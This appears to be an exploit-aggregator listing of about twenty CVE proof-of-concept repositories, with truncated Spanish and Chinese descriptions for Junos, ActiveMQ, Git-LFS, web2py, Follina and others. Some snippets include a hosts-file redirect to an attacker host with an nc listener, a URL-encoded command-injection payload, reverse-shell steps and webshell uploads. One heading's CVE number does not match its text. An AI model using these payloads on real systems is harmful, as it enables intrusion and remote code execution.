270226 matches found
CVE-2023-36845
CVE-2023-36845 ¿Uso? bash cve.sh yourfile.txt Referencias: https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=enUS...
CVE-2026-34197
CVE-2026-34197 — Apache ActiveMQ RCE vía Jolokia API Descripción CVE-2026-34197 es una vulnerabilidad de ejecución remota de código RCE en Apache ActiveMQ Classic que permite a un atacante ejecutar comandos arbitrarios en el sistema operativo del servidor a través de la API Jolokia expuesta en la...
CVE-2020-27955
CVE-2020-27955漏洞复现 1、win机下载有漏洞的版本Git-LFS 下载地址:https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1 2、win机安装,添加如下信息host文件,10.1.1.5即是nc监听8888的主机(可自行替换) 10.1.1.5 abcall.xyz 3、10.1.1.5主机,nc启监听口8888 ┌──root㉿hostname- └─ nc Cmd line: -l -p 8888 4、win机cmd命令行输入 git clone...
CVE-2024-8232
CVE-2024-8232 – Vulnerabilidad de subida de archivos en SpiderControl SCADA Web Server Resumen El servidor web SpiderControl SCADA es vulnerable a la subida arbitraria de archivos sin autenticación, lo que permite a los atacantes subir scripts maliciosos por ejemplo, webshells y obtener ejecución...
CVE-2017-9805
Test nuclei CVE-2017-9805.yaml - struts2 showcase RCE 构建 Dockerfile docker build -t cve-2017-9805 . 启动并分离容器 docker run --name cve-2017-9805 -p 127.0.0.1:8080:8080 -dit cve-2017-9805 /bin/bash 登录到运行中的容器 docker exec -it cve-2017-9805 /bin/bash 启动 Tomcat $CATALINAHOME/bin/startup.sh...
CVE-2018-11235
CVE-2018-11235 快速开始 要构建 Docker 容器,请使用: root@kitploit: make docker 以下 make 命令应在您机器上的不同终端中并行运行 要启动攻击者服务器的容器,请使用: root@kitploit: make runserver 要启动代表受害者的容器,请使用: root@kitploit: make runclient 该容器将运行 client.py 脚本。该脚本会将其 IP 地址和用户名发送给攻击者。 请按照客户端控制台中的说明来克隆恶意 git 仓库。 root@kitploit: git clone...
CVE-2026-33017
CVE-2025-62593 — Exploit RCE no autenticado en Ray Descripción general CVE-2025-62593 es una vulnerabilidad de ejecución remota de código no autenticada en el motor de computación distribuida de IA Ray. La causa raíz es la ausencia de autenticación en endpoints HTTP críticos /api/jobs,...
yaml-payload-2
yaml-payload Un payload de explotación de deserialización de SnakeYAML para CVE-2022-1471 , adaptado de artsploit/yaml-payload originalmente basado en mbechler/marshalsec. Qué hace Cuando se carga mediante el inseguro Yaml.load de SnakeYAML, este payload toma el control de la aplicación en...
CVE-2023-0669-Analysis
CVE-2023-0669 This Repo contain the pcakages and scripts used in this Analysis https://www.vicarius.io/vsociety/blog/unauthenticated-rce-in-goanywhere The vulnerable version of GoAnywhere for Linux https://www.dropbox.com/s/j31l8lgvapbopy3/ga703linuxx64.sh?dl=0...
CVE-2022-45701
CVE-2022-45701 Arris路由器固件9.1.103 - 远程代码执行(RCE)(已认证)POC漏洞利用代码...
CVE-2025-61882
Escáner RCE para Oracle E-Business Suite CVE-2025-61882 Un escáner masivo rápido y multi-hilo para detectar CVE-2025-61882 en instalaciones de Oracle E-Business Suite. Esta vulnerabilidad crítica permite la ejecución remota de código sin autenticación. 🎯 Características Escaneo Masivo - Procesa...
CVE-2019-16113
CVE-2019-16113 这是 Bludit 目录遍历图像文件上传漏洞的 Python 实现 PoC CVE-2019-16113 Bludit 3.9.2 存在远程代码执行漏洞,通过 bl-kernel/ajax/upload-images.php 可实现,因为 PHP 代码可以被写入带有 .jpg(或 .png)文件名的文件中,然后该 PHP 代码可以将其他 PHP 代码写入到 ../ 路径。 原始贡献者: christasa - 原始发现者 sinn3r - Metasploit 模块 https://www.exploit-db.com/exploits/47699...
CVE-2023-24871
CVE-2023-24871 Este repositorio contiene materiales relacionados con CVE-2023-24871, que cubrí en esta serie de publicaciones. Encontrará más información dentro de las carpetas específicas, ya que la vulnerabilidad permitía tanto RCE como LPE...
CVE-2017-11610
Supervisord远程命令执行漏洞脚本(CVE-2017-11610) 漏洞简介 Supervisor 是一个用 Python 写的进程管理工具,可以很方便的用来在 UNIX-like 系统(不支持 Windows)下启动、重启(自动重启程序)、关闭进程(不仅仅是 Python 进程) Supervisor 是一个 C/S 模型的程序,supervisord 是 server 端,supervisorctl 是 client 端,简单理解就是client输入supervisor的指令调用server端的API从而完成一些工作。...
CVE-2022-26134-cve1
CVE-2022-26134RCE Instalación root@kitploit: git clone https://github.com/yigexioabai/CVE-2022-26134-cve1.git cd CVE-2022-26134-cve1 pip3 install -r requirements.txt Coloca CVE-2022-26134RCE.py en el directorio pocsuite3\pocs cd pocs Uso de pocsuite3 URL individual: root@kitploit: pocsuite -r...
CVE-2023-45158
CVE-2023-45158 步骤 1. 运行 Web 服务器 root@kitploit: cd web2py python3 web2py.py 2. 使用以下 URL 注入你的命令 http://:8000/hack?msg=%27%3B%3B%27。将 和 替换为你的值。 示例 1. 在服务器上创建一个文件 http://:8000/hack?msg=%27%3Btouch%20hack%3B%27 2. 反弹 shell 在攻击者的机器上,运行 nc -l 127.0.0.1 8080 访问 URL...
CVE-2020-15778
CVE-2020-15778 简介 本仓库复现了 CVE-2020-15778。 步骤 1. 构建 scp 服务器和客户端的 Docker 镜像 root@kitploit: cd client docker build -t client-cve . root@kitploit: cd server docker build -t server-cve . 2. 在容器中启动 scp 服务器。 root@kitploit: docker run -d -P --name scp-server server-cve 通过以下命令获取 scp 服务器的内部 IP 地址:...
ICT287_CVE-2022-30190_Exploit
ICT287CVE-2022-30190Exploit 关于 CVE-2022-30190 漏洞利用与缓解策略的项目 📌 关于 此仓库包含我的 ICT287 期末项目,其中我探索了 CVE-2022-30190(“Follina”)漏洞。项目涵盖: 漏洞利用的详细分析 分步执行过程 缓解策略 🔥 利用演示 攻击机:Kali Linux 2024.1 受害机:Windows 10 Pro(版本 1809) 利用方法:通过 MSDT 执行远程代码的恶意 Word 文档 Microsoft Office Pro Plus 2019 16.0.10325.20118 🛡️ 缓解措施 禁用 MSDT...
cve-2021-25646
Apache Druid 远程代码执行 漏洞概要 Apache Druid 官方发布安全更新,通报了一个远程代码执行漏洞,漏洞编号 CVE-2021-25646。由于 Apache Druid 默认情况下缺乏授权认证,攻击者可以发 送特制请求,利用 Druid 服务器上进程的特权执行任意代码。 Apache Druid 是用 Java 编写的面向列的开源分布式数据存储,旨在快速获 取大量事件数据,并在数据之上提供低延迟查询。Druid 旨在快速提取大量事件 数据,并在数据之上提供低延迟查询。Druid 通常用于商业智能/ OLAP 应用程序 中,以分析大量的实时和历史数据。 脚本使用...
POC-CVE-2026-23520
CVE-2026-23520 — Ejecución Remota de Código en Etiquetas de Ciclo de Vida de Arcane Inyección de Comandos del Sistema Operativo en Arcane Docker Management 1.13.0 Resumen Arcane es una plataforma moderna de gestión de Docker basada en web. Las versiones anteriores a la 1.13.0 son vulnerables a un...